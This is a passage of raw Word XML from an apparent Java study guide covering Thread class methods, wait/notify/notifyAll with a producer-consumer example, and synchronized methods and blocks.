    </w:p>
    <w:p w14:paraId="2BCBF46E"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unique identifier for the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6CF1B5"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long getId()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50818D1C"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long threadId = thread.getId();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150F5BA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getName()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093B6EB5"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ame of the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4812DE3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String getName()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E389E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String name = thread.getName();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322DEC9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setName(String name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D9FA87"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name of the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136CE430"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Name(String name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537AC26E"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Name("MyThread");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2781CA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0. setPriority(int priority)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393906B7"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priority of the thread. The valid range is from Thread.MIN_PRIORITY (1) to Thread.MAX_PRIORITY (10). By default, a thread has a priority of Thread.NORM_PRIORITY (5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC371EC"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Priority(int priority)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F64399"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Priority(Thread.MAX_PRIORITY);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498C2EC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1. getPriority()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EA8ACA"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priority of the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDB37B5"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int getPriority()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF4E9CE"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priority = thread.getPriority();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BA4F83"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2. join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21893FF7"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 thread to wait until the thread on which join() was called has finished execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2967A55F"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final void join() throws InterruptedException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084001A9"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join();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8C6333"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Variants:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C654DA"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throws InterruptedException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B1E0F2"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int nanos) throws InterruptedException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300F952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3. currentThread()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D8FE6F"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a reference to the currently executing thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA5D44B"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Thread currentThread()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CE37A3"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 current = Thread.currentThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D391B6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4. getState()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DCA77D"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state of the thread. The thread can be in one of the following states:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16125049"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579ECD5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UNNABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0237A39A"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BLOCKED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8BF22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AITING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D4DC1E"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D_WAITING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0D4C9B"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ERMINATED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3840AAC1"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Thread.State getState()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E37CCA"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te state = thread.getState();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6937209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5. setDaemon(boolean on)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E9CDBF"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Marks the thread as a daemon thread or not. Daemon threads are background threads that terminate when all user threads have finished.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86D527"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Daemon(boolean on)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC1EEC"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Daemon(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672B27D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6. isDaemon()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA4305A"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a daemon thread, false otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDFF751"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Daemon()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111F9367"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isDaemon = thread.isDaemon();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03669A0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7. activeCount()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122EEC10"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umber of active threads in the current thread's thread group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D22D12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int activeCount()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBF30A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activeThreads = Thread.activeCount();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BAE5FD"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8. getContextClassLoader()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D15FAE4"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context ClassLoader for the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F46F0D1"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ClassLoader getContextClassLoader()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9162A8"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ClassLoader classLoader = thread.getContextClassLoader();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3782B3FA"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9. setContextClassLoader(ClassLoader cl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3F5BDB"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context ClassLoader for the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B3B8D4"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void setContextClassLoader(ClassLoader cl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC64F72"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ContextClassLoader(newClassLoader);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E285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0. destroy() (Deprecated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511EFB55"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was used to destroy a thread. It is deprecated in Java, and it’s better to let threads die naturally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9CDB39"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destroy()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1892F067"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is method should not be used anymore as it's deprecated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581D58F6" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00CE4B95"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7" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB93E2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300" w:name="_Toc197867514"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do notify methods work in multithreading?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="300"/>
    </w:p>
    <w:p w14:paraId="1007FD86" w14:textId="6C87101A" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F"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how they work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1599FC19"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wait() Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F69114A"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is used to make the current thread release the monitor (lock) and enter the waiting state. A thread can be in the waiting state for two reasons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC9254B"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explicitly waiting for some condition to be met.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA866D2"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waiting for some other thread to notify it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267D3F16"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can be used with a timeout (e.g., wait(long timeout)), which allows a thread to wait for a specified period before it wakes up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE9FCB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048FFA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2276BA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wait(); // Thread waits here until notified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA0EE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14AEDD1"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notify() Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0292375B"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 method wakes up </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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mportant:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> After calling notify(), the thread must release the lock on the object before another thread can acquire the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E71345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37F1B62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4EE52FF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 // Notify one waiting thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496DC2A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0D1FE"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notifyAll() Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7014AA8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All() method wakes up </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> threads that are currently waiting on the object. Once notified, these threads will compete for the lock again and resume execution based on the availability of the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DEF22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ifyAll() is useful when you want all waiting threads to wake up and check if they can proceed, especially when the condition they are waiting for has changed and it may be different for each thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFCBE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4D2F8E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347671D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All(); // Notify all waiting threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFAF57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A7A954"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BE76D0">
          <v:rect id="_x0000_i1858" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0717BFDB"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Points to Remember:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3527DAD9"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ation</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Scheduling</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Thread State</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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E0E042">
          <v:rect id="_x0000_i1859" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63504C1A"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of notify() and wait():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8461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 simple producer-consumer example to demonstrate how notify() and wait() work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ABC5C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ProducerConsumer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD0849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int MAX_CAPACITY = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7A9DD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int itemCount = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34073CC5" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14B313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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FA4FF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produce() throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DAA2A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MAX_CAPACITY) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9DC38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full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E63892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91B6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00C4C1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Produced: " + itemCount);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D0FD0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consumer that there's something to consume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3688D9F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1F2822" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355371C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4189F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consume() throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3656569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0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2944CFD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empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE68E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AF0CAD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2A2B5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Consumed: " + itemCount);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1722AB0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producer that there's space to produce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28086BE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61FA1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67DFB3F" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1C7BE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ProducerConsumerDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CA027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3DCE70B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Consumer pc = new ProducerConsumer();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C8021E" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B06024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 thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50914AC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producer = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EECC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142154B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5DBA90D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produce();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59529A8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500); // Simulate production time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51004AB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33F6E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038B89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1B30FA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101E4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94DDDF" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A106F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 thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A0E99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consumer = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2E763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547ACBF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05EF995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consume();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DAC44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1000); // Simulate consumption time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA87C3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1E1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4F2DB30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2739E33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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CDABDC"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74707B0" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AFED30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start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF1FF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consumer.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADF8F5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D8B121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B41BE37"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242B3739"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producer thread calls produce() and waits if the buffer is full (i.e., itemCount == MAX_CAPACITY), and the consumer thread calls consume() and waits if the buffer is empty (i.e., itemCount == 0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F24745"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the producer adds an item, it calls notify() to wake up the consumer. Similarly, when the consumer consumes an item, it calls notify() to wake up the producer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A4F96E"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used notifyAll() instead of notify(), all waiting threads (in this case, the producer and consumer) would be notified, but only one would proceed at a time, depending on who acquires the lock first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6101E93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demonstrates how notify() and wait() work in thread communication and synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348E9CDD" w14:textId="77965561"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60" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FE2CAA"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301" w:name="_Toc197867515"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is synchronized in multithreading?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="301"/>
    </w:p>
    <w:p w14:paraId="07517F4D" w14:textId="23A2C7E6" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F"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 xml:space="preserve">In multithreading, </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Purpose of Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6893C4E6"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Mutual Exclusion (Mutex)</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that only one thread can access a particular section of code or data at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F58AA4"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Data Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Protects shared resources (like variables or objects) from being modified concurrently by multiple threads, thus maintaining the integrity and consistency of the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D47C4F"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Preventing Race Conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Race conditions occur when multiple threads attempt to modify the shared resource simultaneously, leading to unpredictable results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB1CE8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Ways to Implement Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634CAC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Java provides multiple ways to achieve synchronization in multithreading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8F9CEF"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1. Synchronized Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138434B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A method can be marked as synchronized to ensure that only one thread at a time can execute it on the same object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7640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34F4B9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count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8BD112" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE05B5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thread safety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131CA3C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increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC398E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06CCC13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81C12EB" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680EC25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1941B4D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8C4131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51C676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0DB7369B" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1239"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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2. Synchronized Block:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2024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2A7230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private int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C60400" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C947FA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increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F28C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this) { // Synchronize only this block of code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0F76F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2F540FA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6E8D0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97B5D4" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="132778F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6C581B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B12CFF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BBFFAB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02E240" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1240"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In this case, only the count++ operation is synchronized, making it less restrictive than synchronizing the entire method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAE9713"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3. Synchronized Block with Class-level Lock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E6AE5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synchronize a block of code using the class-level lock (static methods), which ensures that only one thread can execute the synchronized block for the entire class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBAEB9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19ECCB3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static int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3D97CC" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F54A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increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A46932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Counter.class) { // Synchronizing on the class-level lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10885FF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5AD658E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1E5FE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451F8A8" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37BD39D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int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7160F42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2F8255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61AD70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EB7F877" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1241"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Here, Counter.class is the lock object, and the synchronized block ensures that only one thread can increment the static count variable at a time, for the entire class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C3CDAA"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Key Concepts of Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB5C3D5"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Locks</w:t>
      </w:r>
